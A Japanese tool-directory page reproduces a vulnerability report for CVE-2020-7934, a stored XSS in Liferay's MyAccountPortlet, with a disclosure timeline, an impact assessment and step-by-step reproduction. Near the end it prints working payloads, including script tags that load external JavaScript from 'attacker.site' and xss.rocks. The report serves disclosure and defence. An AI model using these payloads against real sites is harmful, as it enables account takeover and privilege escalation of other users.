Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 — LifeRay 7.2.0 GA1のMyAccountPortlet経由の認証された保存型XSS - 検索結果により実行 | Kitploit
ツール/GitHubGitHub/3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHub3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934

liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

LifeRay 7.2.0 GA1のMyAccountPortlet経由の認証された保存型XSS - 検索結果により実行

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
6135年前未レビュー

LifeRay 7.2.1 GA2 の MyAccountPortlet における認証済み保存型XSS(検索結果で実行)

LifeRay バージョン 7.1.0 から 7.2.1 GA2 において、ユーザーアカウントの名、ミドルネーム、姓フィールドはすべて保存型XSSの問題に対して脆弱です。任意のユーザーが特定のXSSペイロードを使用してこれらのフィールドを変更でき、データベースに保存されてユーザーを「感染」させます。その後、他のユーザーを検索するために検索機能を使用すると、ペイロードがレンダリングされます。感染したユーザーが検索結果に表示されると、XSSペイロードが実行されます。

  • 著者/研究者: Casey Erdmann
  • 発見日: 10/17/2019
  • 最終更新日: 10/05/2020
  • 非公開開示: 10/18/2019
  • 公開開示: 01/27/2020 (ブログ記事)
  • 修正リリース: 01/30/2020 Liferay Portal 7.3.0 GA1
  • 概念実証リリース: 10/05/2020

影響

この脆弱性により、攻撃者は検索経由でXSSペイロードをトリガーする任意のユーザーのコンテキストで任意のコードを実行できます。実用上、これは非特権ユーザーから管理者ユーザーへの権限昇格や、他のアカウントを乗っ取る水平移動につながる可能性があります。さらに、JavaScriptで実行可能なものはすべて、別のユーザーのコンテキストで悪用される可能性があります。

概念実証(PoC)でわかるように、デフォルトのコンテキストでは攻撃者が外部スクリプトを簡単に読み込めるため、非常に広範囲に影響があります。

重要なセッションCookieのほとんどはHTTPOnlyフラグが設定されており、単純なセッションハイジャック手法はほとんど防止されています。ただし、古いブラウザでページを表示しているユーザーは、XST攻撃によりさらに影響を受けることに注意してください。

管理者ユーザーはGogo ShellやGroovy Scriptコマンドを実行できるため、通常の意図された機能とこのエクスプロイトを連鎖させ、非特権ユーザーからホストシステム上で意図しないRCEを獲得することも可能かもしれません。

再現手順

この脆弱性がトリガーされるには、2つの条件が満たされる必要があります。

  1. 名、ミドルネーム、または姓フィールドを変更できるユーザーアカウントにアクセスできること。
  2. ユーザーがLifeRayで検索可能であること。通常、これは単にサイトに追加される必要があることを意味します。デフォルトでは、ユーザーは自分自身を基本サイトに追加できるため、追加の承認なしに自分自身を検索可能にすることができます。

これらの条件が満たされると、以下の手順で脆弱性を悪用できます。

  1. アクセス権のあるユーザーとしてログイン
  2. アカウント設定 セクションに移動
    • プロフィールアイコン > アカウント設定 をクリック
    • URLは次のようになります: http://mysite.com/user/hacker/manage?p_p_id=com_liferay_my_account_web_portlet_MyAccountPortlet&p_p_lifecycle=0&p_p_auth=??????
  3. フォームの名、ミドルネーム、または姓フィールドをXSSペイロード(下記のPoC例を参照)で変更し、保存 をクリック
  4. まだサイトに参加していない場合は、http://mysite.com/user/hacker/home/-/my_sites/sites/available-sites?_com_liferay_site_my_sites_web_portlet_MySitesPortlet_displayStyle=descriptive に移動し、右側の「三点リーダー」アイコンをクリックして 参加 を選択することでサイトに参加できます。
  5. 自分のユーザーを検索してXSSペイロードをトリガー: http://mysite.com/web/guest/search?q=<my user>
    • 別のユーザーへの影響を示すテストの場合:
      • 2番目のユーザーとしてサインインし、「感染したユーザー」を検索すると、そのユーザーのコンテキストでもXSSペイロードが実行されます。

PoC シンプルアラート

  • <<SCRIPT>alert("XSS");//<</SCRIPT>

PoC 外部スクリプトとフィルタバイパス

  • <SCRIPT SRC="//attacker.site/payload.js">
  • xss.rocks でデモを試す!
    • <SCRIPT SRC="//xss.rocks/xss.js"/>

レポートバージョン 4.0

ツールをダウンロード